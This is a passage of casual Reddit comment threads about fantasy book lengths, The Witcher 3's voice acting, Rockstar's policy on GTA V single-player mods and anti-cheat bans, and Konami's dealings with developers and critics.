middle third of the series. Yeah, I've heard mixed things about it overall, like how one book was about beetles eating crops and nothing else or something along those lines. I was going to get into it around the time I head Sanderson was brought in to finish it, since I'm a big Sanderson fan, but it seemed like a huge commitment. Personally, I loved the series. The slow down in the middle was noticeable, but I think it's exaggerated by people who had to wait multiple years between books. [This post](https://www.reddit.com/r/Fantasy/comments/2d8cvb/yes_you_should_read_the_wheel_of_time/) is pretty good. I agree, the slowdown was noticable in the 5th book for me especially. The 2nd, 6th, and 12th books were my favorites overall. Good series and its easily worth getting through some of the slower parts as it builds up the events really well. Its a huge commitment but worth it if you are a fan of the fantasy genre. The 2nd book is what really hooked me. I liked the first book enough to give the 2nd book a try. And the 2nd book was amazing, it really got its hooks in me then. I recommend it. A Song of Ice and Fire has something like that per volume I think. AGOT, ACOK, and AFFC are all around 300k.

ASOS and ADWD are above 400k. Yeah, I was going to say "roughly four novels... or one Brandon Sanderson novel", haha. Us sci-fi/fantasy fans get lots of massive doorstoppers. Holy crap. Also, for reference, National Novel Writing Month has a cutoff at 50,000 words for a novel classification. Wikipedia lists 40,000. So, it could also be called 9 novels worth of script. Which, as someone who has done 50k, is a staggering number.  Yeah, but you wouldn't spend 100 hours+ reading a novel, and even if you did it wouldn't be as repetitive and "normal" as the 100,000 lines used in a game.  It's what I love about games.  Man I REALLY want to progress to the end of the story (I feel like I'm pretty close now) but at the same time I want to do these side quests because I feel like I will never touch them if I finish the game. I think I ended up missing an important character who I didn't kill at the end of Witcher 2 in one of these side quests. Was curious compared to something similar. Assuming [this wiki page](http://dragonage.wikia.com/wiki/Voice_cast_%28Inquisition%29) is correct, to this there are *only* 130 voiceover credits in Dragon Age: Inquisition.

The Witcher 3 has a lot of VAs. As others have mentioned, the article doesn't specify that all the voice actors are for the English version. That Dragon Age wiki page is only showing English voice actors. That's the number of VAs, not speaking roles like in the title. I suspect that they're counting any named character as a speaking role, and as others have said they do reuse a lot of VAs (but fair enough, so does every big game). [deleted] The auto-mod has ruined this thread. Personally would rather not see the shit spammed all over the place. Worse than the dumb shit it deleted? Is this more that the old republic? This is really awesome.

I was listening to a conversation ingame and was thinking how many hours went into the animation which we see during the conversations. Many of them are not just standing right in one place they move, sit down, wave their hands around and stuff. 

It seems simple but when you think about it, it makes a huge difference. a lot more immersive for me that Dragon Age's tilted camera They absolutely killed it in this game. Some cut scenes and dialogue is less memorable than others but there has been certain side quests that felt so well put together that it's nearly equaled what I've got out of other entire games. 

The PC version has definitely had some release hiccups and it's not a prefect game but what I do love is they don't treat the gamer like an idiot. You can play how you want, where you want. Shit is hard to figure out sometimes and it can be a difficult game but that's what I enjoy about it so much.  And it is so enjoyably worth it.

Honestly, this is the first open-world RPG that I have actually listened to the full dialogue interaction and not skipped "cinematically" -- let the (main story) voice actors state the first sentence or core sentiment of a part of a conversation, progress the conversation, repeat -- but listened to the entirety of the conversation even if it is as simple as getting some lady's pan out of a house.

The game has rough edges, but the size of it and the depth (I would say if Skyrim were a wading pool, Witcher 3 is a pool without a shallow end - neither is a good thing) as well as the quality in so many key areas for story (facial animations, writing, vocal delivery, content diversity and quality) makes this game arguably the best open world "medieval" RPG that I think has ever been made. [deleted] It was worth it.

I almost feel guilty for spending far too much on a new card and getting it for "free". I'm a cynic and it is **still** the best games in years if not decades. Does somebody know how long the german version took or 2.5 for every language ? What I wanna know in a couple of months: least picked options and least heard dialogue.

Would be nice if 6 months from now CDPR could come out and say": This many options have not been found by anyone anywhere.

Or something close to it. I'd like to know which audio codec TW3 uses. Since there's a ton of voice acting they'd probably go for something voice-specialized so it's probably not MP3 or Ogg. Speex maybe? one of the actors is the one that does the voice of Blackwall in Dragon Age, he does many voices and has that distinct accent [deleted] &gt; We have always appreciated the creative efforts of the PC modding community and we still fondly remember the awesome zombie invasion mod and original GTA map mod for GTAIV PC among many other classics. To be clear, the modding policy in our license has not changed and is the same as for GTAIV.  Recent updates to GTAV PC had an unintended effect of making unplayable certain single player modifications. This was not intentional, no one has been banned for using single player modifications, and you should not worry about being banned or being relegated to the cheater pool just for using single player PC mods. Our primary focus is on protecting GTA Online against modifications that could give players an unfair advantage, disrupt gameplay, or cause griefing. It also bears mentioning that because game mods are by definition unauthorized, they may be broken by technical updates, cause instability, or affect your game in other unforeseen ways.

Reply from Rockstar concerning mods in GTA 5. I just wish you could make your own game so you can fuck around with your friends with these mods. Freeze my character or something! The mods I have been seeing on youtube are hilarious and would be so much fun with your friends. A good solution for this would be dedicated servers, with filters for mod protection and whatnot. That's basically how it was in IV. It would say if a game was modded or not, and if you tried to join an unmodded game with mods, it wouldn't let you in. Why didn't they do that this time around, honestly? Was it just an oversight or something else? Because having people play on private servers with cheats/mods means people wouldn't be playing on their vanilla servers and therefore not buy their microtransactions. I assume it's only a matter of time before someone reverse engineers the server protocol and makes private servers available. Dude, look up FiveM it's already working. Working may loosely apply here. It's a long road before 5m is a contender for gtao. It's still fairly good considering how quickly they got anything working at all. Agreed that it will take a while before people leave GTAO for it. I think the subreddit for the most popular one is /r/fivem  Wow so after looking through that sub I think I'll wait on trying it. I think there's a couple multiplayer mods in the works.  It's always a matter of time private servers exist for dedicated MMO games like World of Warcraft, there isn't any logical reason they won't exist for GTAV Money is so easy to make I forgot they had micro transactions.  how do you make money? Heists with in-game crew/friends on hard. There's micro transactions un gtaV? You can buy GTA Dollar for money. It is like spending your vacation in a foreign country. you have to change your home-country currency into the foreign country currency and you always end up with less than before. It's like that but also you just went on vacation where everything you could ever want was free, all you had to do was walk or drive around and get it. exactly. Nobody knows about it because it's so useless. Literally nobody will pay for gta5 money because heists give you so fucking much it's ridiculous.

Heck if you read the article the first question is The real question is: on what are we going to spend the money from the Heists? (For those who have practically everything)  vens243 2 of the people I play with bought $100 worth of in game money. Trust me... People are buying it. Lots of people think it's because online mods would interfere with their p2w-esque system they go going on right now. I'm inclined to agree.  Online is, in no way, pay to win. It's incredibly balanced.  He's referring to the cash cards. I know.  Money means very little.  Level is the relevant factor as far as gear goes. Either way, less people on those servers means less money for Rockstar. Simple as that. It takes forever to get money to buy things imo.  I disagree, but my crew and I take heists a bit more seriously than most (without being assholes).  We're small, we practice and study them to find more skillful, more effective ways to win, and we just have fun with each other.  The money just appears. A dedicated crew will always be easier than pugging it, but a lot of people (probably MOST people) don't have a dedicated crew that plays at the same time and wants to do heists/missions every time. With that under consideration, it's a lot easier to get levels than make money.

You can level up all day on races or deathmatch, but without a reliable crew you can spend 3 hours, sometimes more, just to get 150k from a heist. My friends and I are too busy and on way different schedules so we can't effectively do heists and regular missions are boring and suck for money. Since the update we've only managed to do 3 heists =/ Me and my friends all tried the prison heist with random folks and we never got past like the 2nd mission. Then we all did it together and were able to knock out several heists pretty quickly. My guess is just how the whole system works. They wanted a very unique online experience with the whole leveling system and what not. Instead of having people find games to join they wanted EVERYONE to be able to work together quicker and find jobs quicker.  They could have a totally separate sandbox mode with no persistent characters, no missions, and no leveling. Just the open world with friends so you can fuck around Yea but they can't make money off of that. Except that they *did* make money off that. All the people who bought the game hoping to be able to fuck around with friends using mods paid money expecting to be able to do just that. And not only did Rockstar not delivery that functionality, but they are actively going to punish anyone pursuing it. But they don't see a way to keep making money off of it if they make it moddable online with private/dedicated servers. 

They don't want to make a one time payment they want what everyone else is doing, especially mobile gaming. In game purchases/DLC for everything. &gt; All the people who bought the game hoping to be able to fuck around with friends using mods paid money expecting to be able to do just that. 

They had no reason to think that was a possibility though.  The sad thing is they have options for invite only (friends/crew) and solo online sessions. If I start up one of those, I should have the option to allow mods. Yeah I agree. Even if it freezes my whole character so I can't buy anything, but am giving whatever for free during the session. Or it makes me create a new character just for modded games. I don't know. [deleted] It's not that simple though. You also need to freeze progress so you couldn't do an all civilians drop a million dollars mod. Definitely possible, but possibly a good deal of work, so it makes sense why that isn't a priority for them. exactly, if you had any mods it would just place you in a modded lobby. That's fairly standard practice for quite a few games and it really shouldn't be that hard for Rockstar to implement. I guess it's too much work for them. There's a couple of project going on to achieve that I think, can't like because Imm on mobile just now.  [FiveM](http://fivem.net) is already functional (though still early in development, of course). While I agree a great idea, it would still need an online profile which is integral to GTA Online. The profile is what ties your character to their money which Rockstar monetizes.

Unless modders create a way to make say dummy accounts on dedicated servers that expires after a set amount of time? Expiring is only implemented to stop people playing only with the dummy accounts as opposed to playing the real game.

Spit balling idea's 
 FYI there are a few 3rd party online servers being worked on now that won't have the restrictions of the official rockstar ones.

Edit: such as http://multiv.mp/ and http://fivem.net/ We used to do this in Dark Forces 2 back in the day.  People would make hacks, called cogs if I remember correctly, and wed have big hacker battles on the premier online gaming service, Microsoft Zone.

For example, I remember one that would make your target spin in place at insane speeds.

God I feel old. There used to be a few CS servers like this too. Fun times.

They still have it, its just called matchmaking now though. Yup, I remember playing on servers like that. Good times.

There was even a poor man's Garry's Mod hack. You could place one of ten or so models over and over again, or delete models. Precisely, something that has been available to people with Jailbroken PS3s and JTAGed/RGH Xbox 360s for pretty much 2 years now. I suspected the people giving anicdotal evidence about being banned for mods in SP were either lying or didn't understand how detection worked.

For those wondering how to disable mods when you go online, Script Hook V mods are automatically disabled but if you want to be sure and/or have other mods that don't rely on Script Hook V you can use [this guide I wrote](https://www.reddit.com/r/GTAV_Mods/comments/34vmwu/how_to_write_a_batch_script_to_disableenable_mods/) which uses a bash script to rename and/or move your mods.

Edit: never mind [there is now a tool for this.](https://www.reddit.com/r/GrandTheftAutoV_PC/comments/34yeee/gta_v_launcher_enabledisable_mods_by_bilago/) It's still useful to know how to do it though as it works on other games. [deleted] [deleted] Why can't they just have an option to jump into modded lobbies and unmodded ones? Is that such a hard thing to create? Am I taking crazy pills? Needs new UI, needs a way to freeze characters, needs lots of extra things that aren't necessarily easy to do. Not that they can't but it's not like tweak a few settings and you have a new feature, it would probably require a good deal of work. I think the majority of people who claimed "I only use mods in singleplayer and I was banned in GTA: O" totally don't understand how Rockstar's cheat detection works.

If you have the mod loaded into the game files and log into GTA: O, as far as Rockstar is concerned, you are using a modification.  They don't care if you never opened up the trainer menu in GTA:O.  If you want to play GTA: O, just use the mod launcher to make sure that all mods are disabled before going online. The mod launcher? What is it? https://www.reddit.com/r/GrandTheftAutoV_PC/comments/34yeee/gta_v_launcher_enabledisable_mods_by_bilago/ Not very knowledgable on the modding scene, does this mean mods running during single player don't turn off for multiplayer? And you could be banned for even opening multiplayer while playing with mods single player?


That would just make me less likely to run mods. Depends what you mean by "turn off." When you go online, Rockstar's anticheat detects any modded files you have placed in the game folder, whether you actually activate the mod or not. All you have to do is remove the mod files from the folder before you go online.   So if you open the online menu accidentally then you are automatically banned by Rockstar's anti-cheat system for modding your game.

Again, this just makes me not want to mod my game at all if it's easy to get banned accidentally for online modding. Maybe they should separate the online and offline clients like CoD does. &gt; So if you open the online menu accidentally then you are automatically banned by Rockstar's anti-cheat system for modding your game.

To be fair certain mods like script hooks has scripts to prevent this...For example script hook will automatically CTD if someone tries to access online. going from story mode to multiplayer is not just selecting your online character, I think there is a popup asking confirmation if the player really wants to go online, people should just be careful. You can play in offline mode IIRC Interesting that people have already been banned for it though, however, you can never be too sure if anyone telling the truth, just because they made a post online saying they hadn't used mods online, doesn't mean they actually did.

Also, why don't they just add a larger FOV range, so people don't need to resort to a mod, which would get them banned if they want a larger FOV online. The issue is probably that when they install these mods, they forget to turn them off when they go online. Even though the person isn't actually using the mod online, the servers pick up that some code is running that shouldn't (after all I believe with the trainer, it has to run code to detect whether someone is activating it), and then autobans the person for hacking.

Of course Rockstar's servers can't tell the difference between a FOV mod and one that spawns infinite money. That's what I was thinking, too. Although if they can tell if you've got a mod running as you enter online, how hard would it be to just warn the player first before a ban is enacted? Your also warning cheaters that their software is detectable and they'll warn others. Generally developers like to find out about a cheat, collect details on people using it then mass ban them in a single wave. A better way to handle it would be to provide some sort of flag these mods could set that lets the game know you're running a mod.  You could then warn players that they're about to go online w/ a mod installed but not actually divulge that the anti-cheat engine detected something.  Granted that's not likely here since there isn't an actual modding API... I assume you mean have mods announce themselves to the game on launch and warn the player if they try to start multiplayer. I guess it could work as long as you don't warn people about unflagged mods, because otherwise your telling them their cheat can be found. That is generally also the best way of doing it, in my opinion, but it is more costly and doesn't deal with cheaters as fast. It doesn't deal with cheaters as quickly on average, but if you give them instant feedback, you make it easier for cheaters to evade your detection and the worst case gets worse. Absolutely, it's a bad short term solution. But from a business perspective for GTA 5 I guess it makes sense, since the online part of GTA doesn't have that much content aside from the heists. Gives hackers an open invitation to test their cheats and tools to skirt passed those checks.

If you look at companies like Blizzard or Valve, they stick you on a list and ban in waves at random times.  This is so the people making the hacks and cheats can't see what works and what doesn't work.  Your cheat can work just fine for 3 or 4 months and then you log in one day and find out you're banned. You're exactly right. It always bugs me when wannabe programmers act as if all this stuff is easy to design and develop when they're just talking out of their asses. My dad was playing the singleplayer game with the trainer to fuck around.

He's not been banned, and if their .dll detection system does pick up singleplayer it's clearly not working that way; most people are probably bullshitting because they're not ready to get shitblasted by the community for hacking (and as a result are too self conscious about their opinion on the internet)
 Actually, if you debug GTA, you'll see that the only time the function call for checking for dll injection is during multiplayer. So yeah, they don't check you in single player  Yeah I also believed that a lot of those "BUT I ONLY MODDED SP" were either bullshitting, or went online by accident.

Shame the community still jumps on the bandwagon so fast though, as it has happened numerous times before, where hackers and idiot start stirring up a storm because they were banned for a legitimate reason. [deleted] It seems like most of the people who claim to have only 'used mods' in single player, and been banned, are confused. What they don't realise is that if the mod is simply pasting a file into the right directory, the game is going to load that whether you're playing singleplayer or multiplayer. Even if you don't use the abilities the mod gives you, it's still loaded by the game, you're still 'using mods', and it's still going to be detected if you're playing online. You need to actually remove any extra files before playing online if you don't want to be banned. Yep, exactly this.

Even if you aren't using the trainer, Rockstar can still see the mod, as it's a memory injection and I'm pretty sure that's the only thing Rockstar's anti-cheat scans for, besides manual bans of course.

Would have been great if the game was made so that you launched single player and multi-player through different .exes, where each instance of the game had it's own library, but that would obliviously disrupt Rockstars  seamless single player to online function. It's really easy to connect to online, that's why some people think they have been banned from singleplayer. A lot of people also want a reason to hate on Rockstar, which made a number of high scoring posts and comments based on misinformation.

I personally use SP mods, which I remove by exiting the game and deleting the files and I have no ban. Absolutely. Rockstar seems to be able to identify if a player is using mods/.dll injection right out of the gate, I don't see why they couldn't prevent modded players from connecting to online in the first place. Because that would be  the perfect tool for a cheat developer. Slight change -&gt; try to launch -&gt; repeat.  Then why do they still have a cheater/hacker issue, if their software is so good at banning fov changers?
 He's not saying it's impossible to cheat. Just that it's bad to give an indication if a cheat is detected or not.  Same idea VAC uses to operate - Ban em for hacking, but do it days/weeks/months after the fact so that they don't know exactly what it was that got detected. So I need to remove the mods and then reinstall them when I leave SP? That's not a problem for simple stuff like the trainers or some crap like that that's really small size-wise, but what about when texture mods and nice shader mods start coming out? If those only replace textures, you won't get banned for those no matter what, ye?

Also, as for whether you're online or not, does that mean you didn't go into an online lobby, or that you launched the game in some offline mode? Makes me sign in automatically and fucks me if I try to start it up without internet connection.  I think textures would probably be an issue due to the possibility of making transparent textures and stuff Ive been pretty loose with mods, leaving the trainer running* while I'm online because I'm lazy,  I have luckily not had any reaction on my account from Rockstar, so is it safe to use the trainer/mods again? 

  

   
*and not using, I detest online cheaters I haven't played the PC version too much yet, but iirc with the PS4 version all you had to do was select the "online" character (the same as you would with Trever/etc. Is it that easy on PC?

If anything, i'd be worried that i would misclick on PC, and be banned. Is this a valid concern? No, the most recent trainer crashes on launching the multiplayer  Its actually rockstar that started the crash to desktop... The trainer, even the latest one would still let you online until monday evening.  It seems r* added something to the online handshake that causes the ctd. It specifically says nobody has been banned for that.

&gt;no one has been banned for using single player modifications, and you should not worry about being banned or being relegated to the cheater pool just for using single player PC mods. Exactly, so people must be going online with mods installed, even if you aren't physically using the mods, Rockstar is going to detect the .dll regardless. &gt; you can never be too sure if anyone telling the truth

"Riot banned me for no reason! I was just trying to provide helpful, kind feedback to my teammates and they all reported me!"

"Valve VAC-banned me and said I was wall-hacking and I totally wasn't!"

"Blizzard banned me for no reason! I never used gold-farming bots!"

Considering how often those statements are true, you actually *can* feel pretty confident that the recent flood of complaints were largely false. GTA:O was exploding with cheaters and all of a sudden people are claiming they're being banned for innocent single player mods? Sure thing, kids. Given that they already have a way of sorting people into different buckets (good sports, bad sports) why not just add a 3rd bucket of (cheaters and modders). They still get to play and do so without affecting non modded players, unfortunately modders and cheaters have to go in the same bucket as it's impossible to tell what you're doing when you're injecting dlls. This is actually done if you get banned a lot or something. why would rockstar pay to host servers that only cheaters and modders can play on?

seems like a waste of money to support fucking scumbags who intend to ruin the online experience for others. they should do it Valve style: Get VAC banned? Get the fuck off of our servers. You can't play on their matchmaking servers for Dota2/CSGO/TF2 if you have a VAC ban for that game or range of games. Obviously community servers still exist but those are player hosted and not going to cost Valve a dime (aside from the Master list server hosting) I'm pretty sure GTA:O is p2p hosted, no skin off Rockstars nose there. While I agree that cheaters should be banned but if its at the expense of modding (awesome thing come out of modding) I would hesitate. Everything in GTAO is routed through some Amazon EC2 servers, so there is a tiny bit of overhead. I'm pretty sure it's 100% just to mask IPs, though. They're banning people for using .dll injectors though. Not because they're changing the fov. And those people are probably forgetting to disable those dll injectors before (possibly accidentally) joining a MP session. Hence why I got banned. I thought I disabled them, joined multiplier and none were working so I thought I was safe, then the patch came around and suddenly I'm banned. I was never all that into the online stuff when it was on PS3, and frankly, I'm not *that* into it for PC either.

If I could get onto a modded server though?  I might get into it. &gt;They're banning people for using .dll injectors though. Not because they're changing the fov.

Is there any other way to change the FoV to a decent setting? There's Flawless Widescreen, but that works by modifying values in memory. I've heard some people say they've been banned for using it. Why do we have PC games that don't allow you to change the FOV? It's 2015 for Christ's sake. They couldn't have added in an FOV slider during any of those numerous delays? Because of the way the engine renders and works. It doesn't always load-in everything behind you or at some far points which aren't visible at the default fov. The game was built around the same FOV so the cinematics and gameplay would feel seemless and good. FOV shouldn't be a design choice made for us. It's preference for a lot of people Very true I can't play in first person mode because it gives me a headache after 5 minutes It's clearly not purely a design choice, there are technical reasons as well.  Is changing your FOV a config setting, or a mod? If it's a mod, they can't tell the difference between a FOV mod or a mod that does anything else. I have a feeling one of the reasons they won;t do it is because the camera is clearly designed to be at that FOV any higher and you start to see the camera clipping the geometry while in a car.Though from what I can tell that should be easily fixed so there's really no excuse. &gt; people have already been banned for it

source? and by that i mean actual proof, not unverifiable claims or circlejerk rumours. also be aware that this is the third time i have asked this question and am *still* yet to get a response apart from upvotes (which honestly don't fucking matter) I didn't word my original comment correctly , I've even replied to other comments saying that I'm sure a lot of people who got banned did actually have mods online despite them not using them, what I mean was, a lot of people are saying they were banned for only modding singe player, but if they go online with those mods still enabled, even if they don't use them, it's still going to show up on R* anti cheat. and i'm asking for actual proof of that statement, not unverifiable claims (like people saying they were banned for only modding single player mode) or circlejerk rumours. in other words i agree with what TotalBiscuit said in his recent video. It's interesting to see those posts. Especially the ones from people saying they were thrown money by someone who was cheating and were banned because of that. Why? Because the night before the initial banwave, I spawned in well over $100million between several players and none of us have been banned *yet*. I fully expect it to eventually get around to me when Rockstar review my account, but unless the flag for money gained in jobs is above $40million in one day or only applies to public games, the people saying they were banned for picking up money are either unlucky or full of shit.

Not to say that Rockstar can do anything but fuck off with their tedious online grind and its inherent limitations. Hopefully as many private server projects slip through the cracks as possible, or have key team members outside of western legal influence. LCPD:FR multiplayer was much more enjoyable than any official modes in GTA4 and SAPD:FR has the same potential. Back when people were giving out billions in winter 2013 on 360, a bunch of friends and I invested most of that money into high value cars on the chance that if the money gets reset, they hopefully wouldn't take the cars.

They didn't so we each had a 10 car garage worth like 5-6 mil. Just a thought. You guys invented money laundering in a game about being criminals. Can't they just make different .exe files for SP and multiplayer like in PC version of CoD? That would break the character switching and "seamless" transition from single to online, I believe. AKA, the super long loading times  It's actually really fast if you just start a closed session and invite only your friends -- I only found it slow when trying to join random public sessions. It's not the loading time, it's the time it takes you to find an open session with a similar connection. My cousin uses Google Fiber and never waits longer than 5 seconds when joining online. [deleted] Actually, thanks to the game's fantastic UI design, you technically can't start a new closed session from the online mode.

You have to load the game into story mode first, then go into the Online menu - you can start a closed session from there.

The game will then put you into free-roam all by yourself - you can invite friends as needed. From my experience, it will then keep you in that same free-roaming instance between missions, so you don't need to wait 2 minutes after a mission ends to move on. Your group *should* stay together as well, but in my experience sometimes it bugged out and I had to re-invite people. You're gonna love this... due to even shittier design you can get around this.  Start in play online, go to the editor, pause again &amp; you magically have the SP pause screen where you can start a private session. Significantly shorter than having to relaunch the game. Can't one exe launch another?  then you would reload the assets back into memory which would effectively just double your load time. huge waste of time. what they programmed isn't perfect but it isn't stupid either. You can transfer loaded assets with different methods of IPC, but it's a pain in the ass. (Easier with "fork" on a POSIX system.) It's just a lot of work that they wouldn't've wanted to bother with. Well, yes, but that still requires launching an executable during gameplay. That would still count as completely relaunching and would take a lot longer. Not if all I'm doing is planning on playing one or the other.  I rarely do both. Sure. But given the choice between faster SP/MP switching and mods, I'd choose mods. If when disconnected it just kept all the assets loaded and tried to reconnect or just have a button prompt to reconnect it would be far shorter than loading all the single player stuff again. No, but you can apply a command line to it to only launch SP. Really??? How do I do that? I've been meaning to try some mods, but I'm terrified of getting banned. Does that launch you straight into the single player game?  It doesn't load up any MP component correct. But I mean, it bypasses the game menu?  I launch the game, and once it's done loading, I'll be in the single player game? You can already set the game to do that from the options menu. The game puts you in SP if you don't do anything in the menu for a few seconds anyway. At least the Steam version does. Why don't they make it so multiplayer just doesn't start if mods are detected instead of just outright banning you? It really should. But not all mods work that way. Some do their work purely in memory. The reason to ban when mods are detected instead of just not letting you enter multiplayer is because doing so makes it much harder to cheat. Cheaters can get banned early on while developing their cheats instead of being able to keep trying until they find a way to get around the block.

Pretty much nobody writes software that works the first time. You always have to retry. I just purchased the game and havent tried MP yet. So how do keep Mods separated? Can someone explain this to me very detailed? As of now:

* Copy mod files into game directory if you want to play singleplayer
* If you want to play GTA:O, exit the game completely, delete the mod files from the game directory, start the game again Or use a mod manager This is the easiest way right now: https://www.reddit.com/r/GrandTheftAutoV_PC/comments/34yeee/gta_v_launcher_enabledisable_mods_by_bilago/ as usual people jumped the gun with these ridiculous claims that they were banning mods for SP. no shit they weren't. it might as well be the same situation with ENB and GTAIV where boris (creator of ENB) started making ridiculous claims that rockstar was trying to stop modding with the latest patch, and then made a hissy fit about how he wasn't going to update the ENB for the newest versions. turns out all rockstar did was change shadows which accidentally broke his mod.

now rockstar, wouldn't it just be easier for you just to add the ability to have the max FOV changed from 80 to 90 at least please? considering a modder did it the day after release, it will make everyone happy. it would make FP mode more playable, especially on online. i really hope they do this, it's quite strange to see they haven't properly acknowledged this yet. &gt; as usual people jumped the gun with these ridiculous claims

Pretty much the tagline for this subreddit.

Remember the Max Payne 3 authentication server drama? I hope that /r/games never gets any more stupid than that. Man, have you seen the gtav and gtavpc subs? Advocating piracy and all other manner of cringeworthy rage... Over something that didn't even happen (nobody was banned for offline mods).

I lost it when i saw them stating how r* was too stupid to develop for pc, a bunch of pc master race entitled nonesense, and that pc gamers should all go pirate it.  So rockstar will stop poluting their platform or some nonesense... And evidently the community agrees judging by the upvotes.


I swear, if i didnt know better i would think the internet is full of crazies.  The pc master race just isnt the pc master race now that these pc master race idiots came.  It makes me long for the console community.  Which i will add, abused the voice chat in game a hell of a lot lesd. If a modder did it and 30% of the time it doesn't work, it's fine. 


If R* did it and 0.5% of the time it fails, they will be the worst company of all time, equal real with ubi and EA The thing is, they already have a slider that works properly. They just chose to set the max possible to an arbitrarily low value.

People with triple monitor setups are getting a decent FoV, which means it's in the game, which means it should be possible. No shit you can use mods on single player. People have been up in arms like they would actually possibly intentionally/outright ban single player modifications. The problem is, a lot of these single player mods are using programs and hooks that cannot be distinguished from hacking programs... and considering the integration with RMT Transactions and the online functionality... That's why you use the Mod Launcher. &gt; We have a long-standing policy on posting copyrighted Rockstar Games material &lt;...&gt;, weve just added a bulletpoint about this particular type of content &lt;...&gt; anyone who posts videos that encourage and promote ways to cheat your way towards gaining illegitimate RP or counterfeit in-game money or duplicating in-game items without having earned them may have their videos flagged for takedown with YouTube.

Why is no one here talking about this? I for one say this new bullet point is great! Because as of right now if I get on youtube and try to find some moneymaking tips all I get is glitch exploit videos page after page. Maybe from now we'll be able to find more decent videos about GTA V Online tips and tricks. No shit. Anyone who got banned was dumb and connected to MP with mods enabled, then went and lied because they were mad.  I think the bigger story in this Q&amp;A is the fact there will not be new heists released any time soon. I basically read it as "No new heists ever" And there you have it. Just like I expected. People who got banned, got banned because they used mods in multiplayer. If you have a FOV mod you have an advantage in multiplayer, that other people don't have. If you use any dll injector, Rockstar can't know what mod you run. This is obvious and grants a ban. Rockstar are only banning for two weeks, so it's not too bad anyway. Just a whole lot of noise about nothing. &gt; If you have a FOV mod you have an advantage in multiplayer, that other people don't have.

I disagree with this unless the game is restricted to first-person only in which case yes it is unfair. Otherwise, especially in free-roam, having a larger FoV is no more an advantage than the guy that can see around corners in third person. Everybody keeps saying that using the FOV mod gives players an advantage, but if you have a tri-screen setup, you get a huge FOV using the vanilla game, so should that also not be allowed because of the advantage it provides? &gt; If you have a FOV mod you have an advantage in multiplayer, that other people don't have.

Every different aspect ratio has a different FOV. "Balance" is a bullshit nonsense argument. &gt; FOV mod you have an advantage in multiplayer

Except I can't even play first person with 70 FoV without feeling sick. 90 FoV is such a tiny advantage to begin with. IMO it's pretty dumb to be banned  for something that not only can other people already get with multi monitors, but something that actually makes that part of the game playable for me. awesome, now everyone can focus on how good single player and modding is compared to Online play, which is stale, repetitive and so boring. Who honestly still gets fun out of endless games of team deathmatch? People are mad because they either accidentally or on purpose went to connect to GTA Online while having those dlls in the main game directory. Rockstar scans your directory as soon as you decide to enter GTA:O, if it sees unacceptable files, they ban your account, simple as that.

GTA:O should not allow any sort of mods, no matter their purpose, ever. It should allow mods in private matches with friends or solo. Glad they have broken the silence on their mod policy. One thing to have it in the EULA or have the support teams making contradicting statements., but it's nice they made a statement without the legal mumbo-jumbo.

~~Edit : honest question, not complaining, but why am i being downvoted? It's one thing if I was off topic or spewing wrong information. But this is just opinion about the current situation.~~ ignore my whining.  [deleted] This is off topic but how on Earth do I obtain that sweet platinum Deagle with the gold hardware in that screenshot? Is that just what the platinum tint looks like on PC? That is a preview of the next content pack. The situation is still unclear about FoV mods it seems.

&gt;protecting GTA Online against modifications that could give players an unfair advantage

Are they categorzed as such or? You cannot tell what a DLL injector is doing, so those will always be rightly banned in online. Rockstar should fix the FOV though In order to avoid gray areas, GTAO should remain a completely *mod-free* game mode, including FoV mods.

As soon as you start allowing certain mods, then people will want other mods to work.  And now you have a situation where R* has to make a list of mods that do work, and don't work, and approve certain mods but not others.

This also opens exploitative loopholes for cheaters. They should just patch that stupid slider, sheesh  It's also a lot harder for anti-cheat software to tell the difference between an FOV mod and something more malicious like a wall hack. It seems pretty clear to me from my understanding FoV mod works like most, if not all other mods currently, which is DLL injecting and from what people smarter than me have said, you cannot whitelist or tell what someone is specifically doing with a dll.

So its not like they are specifically targeting FoV as an "unfair advantage". They're banning all mods online that use .dlls. That's how they're protecting "against modifications that could give players an unfair advantage", by killing the lot. It's impossible to determine what an injected DLL is doing. There's no real way for them to ban aimbots or wall hacks without also banning FOV mods that rely on similar methodology to work. &gt; Our primary focus is on protecting GTA Online against modifications that could give players an unfair advantage, disrupt gameplay, or cause griefing.


Because an FOV mod that makes the game so much more tolerable is unacceptable. And before you say "unfair advantage", remember that you can play in third person, and you can go *really* far away from your character in third person. There's really no reason to have such a narrow FOV in first person.


Still, I understand why they are doing what they are doing, and it is definitely good news to see that they aren't banning people for single-player mod use. So this is a good start. Hopefully, they can fix the damn FOV, and one of my main complaints about the game is solved. &gt;Because an FOV mod that makes the game so much more tolerable is unacceptable.

It doesn't work like that. They can't just block all but ONE particular mod. I'm very much aware, I think I misrepresented my point. I understand why they're blocking mods in Online, completely. 


What I was trying to say, was the FOV is ridiculous and I wish they would fix it.  I'm so happy to hear the rockstar editor is coming to PS4. But can someone tell me, are you able to use it to make videos from GTA Online? If not I'm not sure I want it after all. What about the single-player mods that implement multi-player? Great, so maybe we can stop diluting the Steam reviews section with even *more* bullshit than usual? I wonder if its possible to run win 7 in vmware while using dedicated hardware to run gta v and install as many as mods you want offline. yay let's just ban people instead of warning them and let those 10 year old play the game.
 
i'm done with rockstar It's good to see single player mods might make a return, it seemed strange to release a PC version of the game and not allow ANY mods for it. It'd be nice to see mods be useable in private lobbies, but it doesn't seem likely. This sort of behavior is nothing new for Konami, sadly.

In late 2013, Konami was the console publisher for Skullgirls. Konami delisted Skullgirls around the end of the year, much to the developers' displeasure. [Konami told the developers (Lab Zero Games) that they'd make the relisting process easier if they signed a lifetime gag order that'd prevent them from telling other people what shitty publishers they were](https://twitter.com/Skullgirls/status/597581781278334976). Lab Zero didn't sign, and it took another month or two for Skullgirls to return to the console marketplaces. They had to break ties with Konami to do so. Don't forget they blacklisted Jim Sterling after he said some unkind things about them and their games. 

Not like it stopped him from reviewing their games, he just had to buy them now. I think they even asked for an apology from Destructoid (where he worked) at the time. An apology from Jim Sterling for pointing out how shitty they were being... yeah. And the apology was just "a start". Of course, they didn't apologize. It is hard to justify supporting Konami at this point.  Which is a shame, because seeing the Konami logo used to mean quality. Now it means a company that doesn't give a shit.  back in the NES and SNES days, Capcom and Konami made some of the best 3rd party games on the systems. How the mighty have fallen! [:'\(](https://www.youtube.com/watch?v=C0vznFnBWAY) This is unfortunately the case for the majority of publishers these days. Just about every company has managed to burn half the bridges that allowed them to be successful in the past and they are barely treading water now because of it. I think part of it is that in the past we just didn't care.

